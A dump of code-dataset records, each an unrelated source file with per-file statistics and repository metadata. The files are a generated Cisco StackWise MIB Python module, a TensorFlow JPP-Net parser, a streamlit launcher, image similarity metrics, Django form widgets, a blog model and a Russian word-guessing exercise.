"cswStackPowerEnableNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerSwitchStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerAllocatedGroup")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackWiseMIBComplianceRev3 = cswStackWiseMIBComplianceRev3.setStatus('deprecated') if mibBuilder.loadTexts: cswStackWiseMIBComplianceRev3.setDescription('The compliance statements for entities described in CISCO-STACKWISE-MIB. Stack Power entities are added in this revision.') cswStackWiseMIBComplianceRev4 = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 1, 5)).setObjects(("CISCO-STACKWISE-MIB", "cswNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswNotificationGroupSup1"), ("CISCO-STACKWISE-MIB", "cswStatusGroupRev2"), ("CISCO-STACKWISE-MIB", "cswStackPowerEnableNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswDistrStackLinkStatusGroup"), ("CISCO-STACKWISE-MIB", "cswDistrStackPhyPortStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerSwitchStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerAllocatedGroup")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackWiseMIBComplianceRev4 = cswStackWiseMIBComplianceRev4.setStatus('current') if mibBuilder.loadTexts: cswStackWiseMIBComplianceRev4.setDescription('The compliance statements for entities described in CISCO-STACKWISE-MIB. Stack Global entities are added in this revision.') cswStatusGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 1)).setObjects(("CISCO-STACKWISE-MIB", "cswMaxSwitchNum"), ("CISCO-STACKWISE-MIB", "cswMaxSwitchConfigPriority"), ("CISCO-STACKWISE-MIB", "cswRingRedundant"), ("CISCO-STACKWISE-MIB", "cswEnableStackNotifications"), ("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent"), ("CISCO-STACKWISE-MIB", "cswSwitchNumNextReload"), ("CISCO-STACKWISE-MIB", "cswSwitchRole"), ("CISCO-STACKWISE-MIB", "cswSwitchSwPriority"), ("CISCO-STACKWISE-MIB", "cswSwitchHwPriority"), ("CISCO-STACKWISE-MIB", "cswSwitchState"), ("CISCO-STACKWISE-MIB", "cswSwitchMacAddress"), ("CISCO-STACKWISE-MIB", "cswSwitchSoftwareImage"), ("CISCO-STACKWISE-MIB", "cswStackPortOperStatus"), ("CISCO-STACKWISE-MIB", "cswStackPortNeighbor"), ("CISCO-STACKWISE-MIB", "cswStackPowerType")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStatusGroup = cswStatusGroup.setStatus('deprecated') if mibBuilder.loadTexts: cswStatusGroup.setDescription('A collection of objects that are used for control and status.') cswNotificationGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 2)).setObjects(("CISCO-STACKWISE-MIB", "cswStackPortChange"), ("CISCO-STACKWISE-MIB", "cswStackNewMaster"), ("CISCO-STACKWISE-MIB", "cswStackMismatch"), ("CISCO-STACKWISE-MIB", "cswStackRingRedundant"), ("CISCO-STACKWISE-MIB", "cswStackNewMember"), ("CISCO-STACKWISE-MIB", "cswStackMemberRemoved")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswNotificationGroup = cswNotificationGroup.setStatus('current') if mibBuilder.loadTexts: cswNotificationGroup.setDescription('A collection of notifications that are required.') cswStatusGroupRev1 = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 3)).setObjects(("CISCO-STACKWISE-MIB", "cswMaxSwitchNum"), ("CISCO-STACKWISE-MIB", "cswMaxSwitchConfigPriority"), ("CISCO-STACKWISE-MIB", "cswRingRedundant"), ("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent"), ("CISCO-STACKWISE-MIB", "cswSwitchNumNextReload"), ("CISCO-STACKWISE-MIB", "cswSwitchRole"), ("CISCO-STACKWISE-MIB", "cswSwitchSwPriority"), ("CISCO-STACKWISE-MIB", "cswSwitchHwPriority"), ("CISCO-STACKWISE-MIB", "cswSwitchState"), ("CISCO-STACKWISE-MIB", "cswSwitchMacAddress"), ("CISCO-STACKWISE-MIB", "cswSwitchSoftwareImage")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStatusGroupRev1 = cswStatusGroupRev1.setStatus('current') if mibBuilder.loadTexts: cswStatusGroupRev1.setDescription('A collection of objects that are used for control and status.') cswStackPowerStatusGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 4)).setObjects(("CISCO-STACKWISE-MIB", "cswStackPowerMode"), ("CISCO-STACKWISE-MIB", "cswStackPowerMasterMacAddress"), ("CISCO-STACKWISE-MIB", "cswStackPowerMasterSwitchNum"), ("CISCO-STACKWISE-MIB", "cswStackPowerNumMembers"), ("CISCO-STACKWISE-MIB", "cswStackPowerType"), ("CISCO-STACKWISE-MIB", "cswStackPowerName")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackPowerStatusGroup = cswStackPowerStatusGroup.setStatus('current') if mibBuilder.loadTexts: cswStackPowerStatusGroup.setDescription('A collection of stack power objects that are used for control and status of power stack.') cswStackPowerSwitchStatusGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 5)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchPowerBudget"), ("CISCO-STACKWISE-MIB", "cswSwitchPowerCommited"), ("CISCO-STACKWISE-MIB", "cswSwitchSystemPowerPriority"), ("CISCO-STACKWISE-MIB", "cswSwitchPoeDevicesLowPriority"), ("CISCO-STACKWISE-MIB", "cswSwitchPoeDevicesHighPriority")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackPowerSwitchStatusGroup = cswStackPowerSwitchStatusGroup.setStatus('current') if mibBuilder.loadTexts: cswStackPowerSwitchStatusGroup.setDescription('A collection of stack power objects that are used to track the stack power parameters of a switch.') cswStackPowerPortStatusGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 6)).setObjects(("CISCO-STACKWISE-MIB", "cswStackPowerPortOperStatus"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortNeighborMacAddress"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortNeighborSwitchNum"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortLinkStatus"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortOverCurrentThreshold"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortName")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackPowerPortStatusGroup = cswStackPowerPortStatusGroup.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortStatusGroup.setDescription('A collection of objects that are used for control and status of stack power ports.') cswStackPowerNotificationGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 7)).setObjects(("CISCO-STACKWISE-MIB", "cswStackPowerPortLinkStatusChanged"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortOperStatusChanged"), ("CISCO-STACKWISE-MIB", "cswStackPowerVersionMismatch"), ("CISCO-STACKWISE-MIB", "cswStackPowerInvalidTopology"), ("CISCO-STACKWISE-MIB", "cscwStackPowerBudgetWarrning"), ("CISCO-STACKWISE-MIB", "cswStackPowerInvalidInputCurrent"), ("CISCO-STACKWISE-MIB", "cswStackPowerInvalidOutputCurrent"), ("CISCO-STACKWISE-MIB", "cswStackPowerUnderBudget"), ("CISCO-STACKWISE-MIB", "cswStackPowerUnbalancedPowerSupplies"), ("CISCO-STACKWISE-MIB", "cswStackPowerInsufficientPower"), ("CISCO-STACKWISE-MIB", "cswStackPowerPriorityConflict"), ("CISCO-STACKWISE-MIB", "cswStackPowerUnderVoltage"), ("CISCO-STACKWISE-MIB", "cswStackPowerGLS"), ("CISCO-STACKWISE-MIB", "cswStackPowerILS"), ("CISCO-STACKWISE-MIB", "cswStackPowerSRLS"), ("CISCO-STACKWISE-MIB", "cswStackPowerSSLS")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackPowerNotificationGroup = cswStackPowerNotificationGroup.setStatus('current') if mibBuilder.loadTexts: cswStackPowerNotificationGroup.setDescription('A collection of notifications that are triggered whenever there is either a change in stack power object or an error is encountered.') cswStackPowerEnableNotificationGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 8)).setObjects(("CISCO-STACKWISE-MIB", "cswEnableIndividualStackNotifications")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackPowerEnableNotificationGroup = cswStackPowerEnableNotificationGroup.setStatus('current') if mibBuilder.loadTexts: cswStackPowerEnableNotificationGroup.setDescription('This group contains the notification enable objects for this MIB.') cswNotificationGroupSup1 = NotificationGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 9)).setObjects(("CISCO-STACKWISE-MIB", "cswStackMemberToBeReloadedForUpgrade")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswNotificationGroupSup1 = cswNotificationGroupSup1.setStatus('current') if mibBuilder.loadTexts: cswNotificationGroupSup1.setDescription('Additional notification required for data stack.') cswStackPowerAllocatedGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 10)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchPowerAllocated")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackPowerAllocatedGroup = cswStackPowerAllocatedGroup.setStatus('current') if mibBuilder.loadTexts: cswStackPowerAllocatedGroup.setDescription('A collection of objects providing the stack power allocation information of a switch.') cswStatusGroupRev2 = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 11)).setObjects(("CISCO-STACKWISE-MIB", "cswMaxSwitchNum"), ("CISCO-STACKWISE-MIB", "cswMaxSwitchConfigPriority"), ("CISCO-STACKWISE-MIB", "cswRingRedundant"), ("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent"), ("CISCO-STACKWISE-MIB", "cswSwitchNumNextReload"), ("CISCO-STACKWISE-MIB", "cswSwitchRole"), ("CISCO-STACKWISE-MIB", "cswSwitchSwPriority"), ("CISCO-STACKWISE-MIB", "cswSwitchHwPriority"), ("CISCO-STACKWISE-MIB", "cswSwitchState"), ("CISCO-STACKWISE-MIB", "cswSwitchMacAddress"), ("CISCO-STACKWISE-MIB", "cswStackDomainNum"), ("CISCO-STACKWISE-MIB", "cswStackType"), ("CISCO-STACKWISE-MIB", "cswStackBandWidth")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStatusGroupRev2 = cswStatusGroupRev2.setStatus('current') if mibBuilder.loadTexts: cswStatusGroupRev2.setDescription('A collection of objects that are used for control and status.') cswDistrStackLinkStatusGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 12)).setObjects(("CISCO-STACKWISE-MIB", "cswDistrStackLinkBundleOperStatus")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswDistrStackLinkStatusGroup = cswDistrStackLinkStatusGroup.setStatus('current') if mibBuilder.loadTexts: cswDistrStackLinkStatusGroup.setDescription('A collection object(s) for control and status of the distributed Stack Link.') cswDistrStackPhyPortStatusGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 13)).setObjects(("CISCO-STACKWISE-MIB", "cswDistrStackPhyPort"), ("CISCO-STACKWISE-MIB", "cswDistrStackPhyPortOperStatus"), ("CISCO-STACKWISE-MIB", "cswDistrStackPhyPortNbr"), ("CISCO-STACKWISE-MIB", "cswDistrStackPhyPortNbrsw")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswDistrStackPhyPortStatusGroup = cswDistrStackPhyPortStatusGroup.setStatus('current') if mibBuilder.loadTexts: cswDistrStackPhyPortStatusGroup.setDescription('A collection of objects for control and status of the distributed stack port') mibBuilder.exportSymbols("CISCO-STACKWISE-MIB", cswDistrStackPhyPort=cswDistrStackPhyPort, cswDistrStackLinkInfoTable=cswDistrStackLinkInfoTable, cswStackPowerPortInfoTable=cswStackPowerPortInfoTable, cswStackInfo=cswStackInfo, cswStatusGroupRev1=cswStatusGroupRev1, cswSwitchMacAddress=cswSwitchMacAddress, cswStackPowerSwitchStatusGroup=cswStackPowerSwitchStatusGroup, cscwStackPowerBudgetWarrning=cscwStackPowerBudgetWarrning, cswStackPowerPortOverCurrentThreshold=cswStackPowerPortOverCurrentThreshold, cswSwitchPoeDevicesHighPriority=cswSwitchPoeDevicesHighPriority, cswDSLindex=cswDSLindex, cswStackPowerStackNumber=cswStackPowerStackNumber, cswStackPowerInfo=cswStackPowerInfo, cswStackNewMember=cswStackNewMember, cswStackPowerInvalidInputCurrent=cswStackPowerInvalidInputCurrent, cswStackPowerEnableNotificationGroup=cswStackPowerEnableNotificationGroup, cswStackPowerInfoTable=cswStackPowerInfoTable, cswStackPowerInfoEntry=cswStackPowerInfoEntry, cswRingRedundant=cswRingRedundant, cswStackPowerPortLinkStatus=cswStackPowerPortLinkStatus, cswStackDomainNum=cswStackDomainNum, cswStackPowerPortNeighborMacAddress=cswStackPowerPortNeighborMacAddress, cswStackWiseMIBComplianceRev1=cswStackWiseMIBComplianceRev1, cswMaxSwitchConfigPriority=cswMaxSwitchConfigPriority, CswSwitchPriority=CswSwitchPriority, cswStackWiseMIBComplianceRev2=cswStackWiseMIBComplianceRev2, cswStackNewMaster=cswStackNewMaster, cswStackPortChange=cswStackPortChange, cswSwitchState=cswSwitchState, cswStackPowerPriorityConflict=cswStackPowerPriorityConflict, cswStackPowerName=cswStackPowerName, cswDistrStackPhyPortStatusGroup=cswDistrStackPhyPortStatusGroup, cswStackPowerUnderVoltage=cswStackPowerUnderVoltage, cswStackPowerPortInfoEntry=cswStackPowerPortInfoEntry, cswStackMemberToBeReloadedForUpgrade=cswStackMemberToBeReloadedForUpgrade, CswPowerStackType=CswPowerStackType, cswStackPortInfoTable=cswStackPortInfoTable, cswStackPowerInvalidTopology=cswStackPowerInvalidTopology, cswStackPowerPortStatusGroup=cswStackPowerPortStatusGroup, cswSwitchPowerCommited=cswSwitchPowerCommited, cswStackBandWidth=cswStackBandWidth, cswStackPowerStatusGroup=cswStackPowerStatusGroup, cswStackPowerMasterMacAddress=cswStackPowerMasterMacAddress, ciscoStackWiseMIB=ciscoStackWiseMIB, cswDistrStackPhyPortOperStatus=cswDistrStackPhyPortOperStatus, cswEnableStackNotifications=cswEnableStackNotifications, ciscoStackWiseMIBConform=ciscoStackWiseMIBConform, cswSwitchPowerAllocated=cswSwitchPowerAllocated, cswStackPowerInsufficientPower=cswStackPowerInsufficientPower, cswStackPowerPortNeighborSwitchNum=cswStackPowerPortNeighborSwitchNum, cswStackPowerPortName=cswStackPowerPortName, cswSwitchInfoTable=cswSwitchInfoTable, cswSwitchPoeDevicesLowPriority=cswSwitchPoeDevicesLowPriority, cswStackWiseMIBCompliances=cswStackWiseMIBCompliances, cswStackPowerPortIndex=cswStackPowerPortIndex, cswSwitchSwPriority=cswSwitchSwPriority, cswSwitchSoftwareImage=cswSwitchSoftwareImage, cswStackWiseMIBComplianceRev3=cswStackWiseMIBComplianceRev3, cswStackMismatch=cswStackMismatch, cswStackPowerType=cswStackPowerType, cswSwitchPowerBudget=cswSwitchPowerBudget, cswDistrStackLinkStatusGroup=cswDistrStackLinkStatusGroup, cswStackPowerVersionMismatch=cswStackPowerVersionMismatch, cswStackPowerSRLS=cswStackPowerSRLS, PYSNMP_MODULE_ID=ciscoStackWiseMIB, cswStackPowerNotificationGroup=cswStackPowerNotificationGroup, cswStatusGroup=cswStatusGroup, cswDistrStackPhyPortNbrsw=cswDistrStackPhyPortNbrsw, cswNotificationGroup=cswNotificationGroup, cswStackPowerGLS=cswStackPowerGLS, cswStackMemberRemoved=cswStackMemberRemoved, cswDistrStackLinkInfoEntry=cswDistrStackLinkInfoEntry, cswSwitchHwPriority=cswSwitchHwPriority, cswStackWiseMIBComplianceRev4=cswStackWiseMIBComplianceRev4, cswStackPowerInvalidOutputCurrent=cswStackPowerInvalidOutputCurrent, cswStackPowerPortLinkStatusChanged=cswStackPowerPortLinkStatusChanged, cswStackPowerPortOperStatus=cswStackPowerPortOperStatus, cswStackPowerUnderBudget=cswStackPowerUnderBudget, cswStackWiseMIBGroups=cswStackWiseMIBGroups, cswStackRingRedundant=cswStackRingRedundant, cswStackType=cswStackType, cswStackPortInfoEntry=cswStackPortInfoEntry, cswStackPortOperStatus=cswStackPortOperStatus, cswStackPowerPortOperStatusChanged=cswStackPowerPortOperStatusChanged, cswStackPowerILS=cswStackPowerILS, cswStackPowerAllocatedGroup=cswStackPowerAllocatedGroup, cswEnableIndividualStackNotifications=cswEnableIndividualStackNotifications, cswDistrStackPhyPortNbr=cswDistrStackPhyPortNbr, cswStatusGroupRev2=cswStatusGroupRev2, CswSwitchNumber=CswSwitchNumber, cswNotificationGroupSup1=cswNotificationGroupSup1, cswMIBNotifications=cswMIBNotifications, cswStackPowerMasterSwitchNum=cswStackPowerMasterSwitchNum, cswGlobals=cswGlobals, cswMaxSwitchNum=cswMaxSwitchNum, CswSwitchNumberOrZero=CswSwitchNumberOrZero, cswStackPowerMode=cswStackPowerMode, ciscoStackWiseMIBNotifs=ciscoStackWiseMIBNotifs, cswStackPortNeighbor=cswStackPortNeighbor, cswDistrStackPhyPortInfoEntry=cswDistrStackPhyPortInfoEntry, cswStackWiseMIBCompliance=cswStackWiseMIBCompliance, cswDistrStackPhyPortInfoTable=cswDistrStackPhyPortInfoTable, CswPowerStackMode=CswPowerStackMode, cswStackPowerSSLS=cswStackPowerSSLS, cswSwitchSystemPowerPriority=cswSwitchSystemPowerPriority, cswSwitchNumCurrent=cswSwitchNumCurrent, ciscoStackWiseMIBObjects=ciscoStackWiseMIBObjects, cswStackPowerNumMembers=cswStackPowerNumMembers, cswSwitchRole=cswSwitchRole, cswDistrStackLinkBundleOperStatus=cswDistrStackLinkBundleOperStatus, cswSwitchNumNextReload=cswSwitchNumNextReload, cswStackPowerUnbalancedPowerSupplies=cswStackPowerUnbalancedPowerSupplies, cswSwitchInfoEntry=cswSwitchInfoEntry)
182.735602
5,651
0.798195
8,007
69,805
6.958411
0.099663
0.038983
0.068221
0.007682
0.453568
0.343151
0.312657
0.286255
0.237041
0.216509
0
0.035015
0.097472
69,805
381
5,652
183.215223
0.849352
0.004756
0
0.07989
0
0.179063
0.480983
0.066639
0
0
0
0
0
1
0
false
0
0.030303
0
0.099174
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
00a9b7b80e70b2ade8a74bf8036397114cf2dc47
217
py
Python
app/launcher.py
bcheng004/reddit-recommender
3446ca25b9320a2ca94e4ab1a08056e81edd6d45
[ "MIT" ]
1
2022-01-06T02:21:31.000Z
2022-01-06T02:21:31.000Z
app/launcher.py
bcheng004/reddit-recommender
3446ca25b9320a2ca94e4ab1a08056e81edd6d45
[ "MIT" ]
null
null
null
app/launcher.py
bcheng004/reddit-recommender
3446ca25b9320a2ca94e4ab1a08056e81edd6d45
[ "MIT" ]
null
null
null
import os, confuse config = confuse.Configuration('RecLauncher') config.set_file('config-st.yaml') server_port = config['streamlit']['server_port'].get() os.system(f"streamlit run app.py --server.port {server_port}")
36.166667
62
0.760369
31
217
5.193548
0.612903
0.248447
0
0
0
0
0
0
0
0
0
0
0.069124
217
6
62
36.166667
0.79703
0
0
0
0
0
0.426606
0
0
0
0
0
0
1
0
false
0
0.2
0
0.2
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
00b06443ce4f30563dab2c820a73ba95e0735e30
1,494
py
Python
src/model/JPPNet.py
quangostudio/fastapi
62eec06a2dd7a5a137373fc0d08017cf240f51a7
[ "MIT" ]
null
null
null
src/model/JPPNet.py
quangostudio/fastapi
62eec06a2dd7a5a137373fc0d08017cf240f51a7
[ "MIT" ]
null
null
null
src/model/JPPNet.py
quangostudio/fastapi
62eec06a2dd7a5a137373fc0d08017cf240f51a7
[ "MIT" ]
1
2021-12-09T11:15:41.000Z
2021-12-09T11:15:41.000Z
''' This file implements JPP-Net for human parsing and pose detection. ''' import tensorflow as tf import os from tensorflow.python.framework import graph_util import numpy as np from PIL import Image import matplotlib.pyplot as plt from tensorflow.python.platform import gfile import time class JPP(object): # Magic numbers are for normalization. You can get details from original JPP-Net repo. IMG_MEAN = np.array((104.00698793,116.66876762,122.67891434), dtype=np.float32) def __init__(self, pb_path): options = tf.GPUOptions(allow_growth=True) sess = tf.Session(config=tf.ConfigProto(gpu_options=options)) self.sess = tf.Session() with gfile.FastGFile(pb_path, 'rb') as f: graph_def = tf.GraphDef() graph_def.ParseFromString(f.read()) self.sess.graph.as_default() tf.import_graph_def(graph_def, name='') # import compute graph self.sess.run(tf.global_variables_initializer()) self.img_tensor = sess.graph.get_tensor_by_name('img_1:0') self.pose_tensor = sess.graph.get_tensor_by_name('pose:0') self.parse_tensor = sess.graph.get_tensor_by_name('parse:0') def predict(self, img): ''' img is a human image array with shape (any,any,3) return a list, [pose, parse] ''' ret = self.sess.run([self.pose_tensor,self.parse_tensor], feed_dict={self.img_tensor: img-JPP.IMG_MEAN}) return ret
36.439024
113
0.672691
213
1,494
4.549296
0.464789
0.033024
0.04644
0.055728
0.092879
0.092879
0.092879
0
0
0
0
0.034423
0.222222
1,494
41
114
36.439024
0.799484
0.168675
0
0
0
0
0.018288
0
0
0
0
0
0
1
0.076923
false
0
0.346154
0
0.538462
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
00c7a204bdfb47a3865e131d3affcf1f44535d58
1,049
py
Python
tools/similarity.py
bruinxiong/gnerf
5a6f1141a5b87dac66a755c7238263da85934d72
[ "MIT" ]
137
2021-07-25T03:48:07.000Z
2022-03-31T17:52:28.000Z
tools/similarity.py
bruinxiong/gnerf
5a6f1141a5b87dac66a755c7238263da85934d72
[ "MIT" ]
4
2021-09-08T03:21:19.000Z
2022-03-30T07:53:31.000Z
tools/similarity.py
bruinxiong/gnerf
5a6f1141a5b87dac66a755c7238263da85934d72
[ "MIT" ]
10
2021-11-16T11:31:55.000Z
2022-03-23T00:59:35.000Z
import torch from kornia.losses import ssim as dssim from lpips_pytorch import LPIPS lpips_fn = LPIPS(net_type='alex', version='0.1') lpips_fn.eval() def mse(image_pred, image_gt, valid_mask=None, reduction='mean'): value = (image_pred - image_gt) ** 2 if valid_mask is not None: value = value[valid_mask] if reduction == 'mean': return torch.mean(value) return value def psnr(image_pred, image_gt, valid_mask=None, reduction='mean'): image_pred = image_pred / 2 + 0.5 image_gt = image_gt / 2 + 0.5 return -10 * torch.log10(mse(image_pred, image_gt, valid_mask, reduction)) def ssim(image_pred, image_gt, reduction='mean'): image_pred = image_pred / 2 + 0.5 image_gt = image_gt / 2 + 0.5 dssim_ = dssim(image_pred, image_gt, 3, reduction) # dissimilarity in [0, 1] return 1 - 2 * dssim_ # in [-1, 1] def lpips(image_pred, image_gt, device='cpu'): lpips_fn.to(device) with torch.no_grad(): lpips_ = lpips_fn(image_pred, image_gt) return lpips_.mean().item()
28.351351
81
0.672069
167
1,049
3.982036
0.287425
0.162406
0.210526
0.192481
0.306767
0.306767
0.306767
0.26015
0.26015
0.153383
0
0.031175
0.204957
1,049
36
82
29.138889
0.766187
0.032412
0
0.153846
0
0
0.025692
0
0
0
0
0
0
1
0.153846
false
0
0.115385
0
0.461538
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
00d5c06169e029f19ff54dc53dda05af8a89e021
917
py
Python
formly/forms/widgets.py
coloradocarlos/formly
88ee816835687c7ab8c80fe78f3e32c9e1761a33
[ "BSD-3-Clause" ]
34
2015-02-08T15:07:44.000Z
2021-07-04T05:05:37.000Z
formly/forms/widgets.py
coloradocarlos/formly
88ee816835687c7ab8c80fe78f3e32c9e1761a33
[ "BSD-3-Clause" ]
30
2015-01-21T15:39:00.000Z
2021-07-04T05:12:03.000Z
formly/forms/widgets.py
coloradocarlos/formly
88ee816835687c7ab8c80fe78f3e32c9e1761a33
[ "BSD-3-Clause" ]
10
2015-04-22T13:13:27.000Z
2021-06-08T19:53:36.000Z
from django.forms import TextInput from django.forms.widgets import MultiWidget, RadioSelect from django.template.loader import render_to_string class MultiTextWidget(MultiWidget): def __init__(self, widgets_length, **kwargs): widgets = [TextInput() for _ in range(widgets_length)] kwargs.update({"widgets": widgets}) super(MultiTextWidget, self).__init__(**kwargs) def decompress(self, value): return value if value is not None else [] def format_output(self, rendered_widgets): return render_to_string( "formly/run/_multiple_input.html", context={ "inputs": rendered_widgets } ) class LikertSelect(RadioSelect): """ This class differentiates Likert-scale radio selects from "normal" radio selects for presentation purposes. """ pass class RatingSelect(RadioSelect): pass
26.970588
62
0.676118
98
917
6.122449
0.561224
0.05
0.05
0
0
0
0
0
0
0
0
0
0.237732
917
33
63
27.787879
0.858369
0.116685
0
0.095238
0
0
0.055696
0.039241
0
0
0
0
0
1
0.142857
false
0.095238
0.142857
0.095238
0.52381
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
2
00e1a3dc3b3a1c20f6037788df47098e679b8083
447
py
Python
models/blog.py
AbhishekPednekar84/personal-portfolio
b7aa797e52399bc002efee21e78195edc110a446
[ "MIT" ]
2
2020-01-15T07:18:11.000Z
2020-01-29T16:36:20.000Z
models/blog.py
AbhishekPednekar84/personal-portfolio
b7aa797e52399bc002efee21e78195edc110a446
[ "MIT" ]
2
2019-11-19T08:50:11.000Z
2019-12-29T07:15:59.000Z
models/blog.py
AbhishekPednekar84/personal-portfolio
b7aa797e52399bc002efee21e78195edc110a446
[ "MIT" ]
null
null
null
from extensions import db from sqlalchemy.dialects.postgresql import TSVECTOR class Blog(db.Model): __tablename__ = "blog" id = db.Column(db.Integer, primary_key=True) title = db.Column(db.String(100)) url = db.Column(db.String(100)) description = db.Column(db.String(1000)) description_token = db.Column(TSVECTOR) def __repr__(self): return f"Blog({self.id}, {self.title}, {self.url}, {self.description})"
27.9375
79
0.689038
61
447
4.885246
0.491803
0.134228
0.134228
0.161074
0.127517
0
0
0
0
0
0
0.026954
0.170022
447
15
80
29.8
0.77628
0
0
0
0
0.090909
0.145414
0
0
0
0
0
0
1
0.090909
false
0
0.181818
0.090909
1
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
2
da9a059c634fcea4a96216e4d1ee920ceb4dd1fd
1,581
py
Python
INBa/2015/SOSNOVY_M_S/task_9_26.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
INBa/2015/SOSNOVY_M_S/task_9_26.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
INBa/2015/SOSNOVY_M_S/task_9_26.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
# Задание 9. Вариант 26 # Создайте игру, в которой компьютер выбирает какое-либо слово, а игрок должен его отгадать. Компьютер сообщает игроку, сколько букв в слове, и дает пять попыток узнать, есть ли какая-либо буква в слове, причем программа может отвечать только "Да" и "Нет". Вслед за тем игрок должен попробовать отгадать слово. # Sosnovy M.S. # 01.02.2016 import random slova = ("нужен", "автомат", "программирование", "очень") slovo = str(random.choice(slova)) bykv = len(slovo) print("Я загадл слово в нем ", str(bykv), " букв. У Вас есть 5 попыток узнать есть л в этом слове какая-либо буква.") print("Какую букву вы загадываете?") bykva = str(input()) if bykva in slovo: print ("Ваша буква встречаеться") else: print ("Ваша буква не встречаеться") print("Какую букву вы загадываете?") bykva = str(input()) if bykva in slovo: print ("Ваша буква встречаеться") else: print ("Ваша буква не встречаеться") print("Какую букву вы загадываете?") bykva = str(input()) if bykva in slovo: print ("Ваша буква встречаеться") else: print ("Ваша буква не встречаеться") print("Какую букву вы загадываете?") bykva = str(input()) if bykva in slovo: print ("Ваша буква встречаеться") else: print ("Ваша буква не встречаеться") print("Какую букву вы загадываете?") bykva = str(input()) if bykva in slovo: print ("Ваша буква встречаеться") else: print ("Ваша буква не встречаеться") print("Ваш ответ:") otvet = str(input()) while (otvet!=slovo): print("Попробуйте еще раз...") if (otvet==slovo): print("Поздравляю Вы победили!!! WIN") input ("Нажмите ENTER для продолжения")
32.265306
310
0.726755
233
1,581
4.93133
0.412017
0.078329
0.121845
0.073977
0.496084
0.496084
0.496084
0.496084
0.496084
0.496084
0
0.008909
0.148008
1,581
49
311
32.265306
0.844098
0.223909
0
0.714286
0
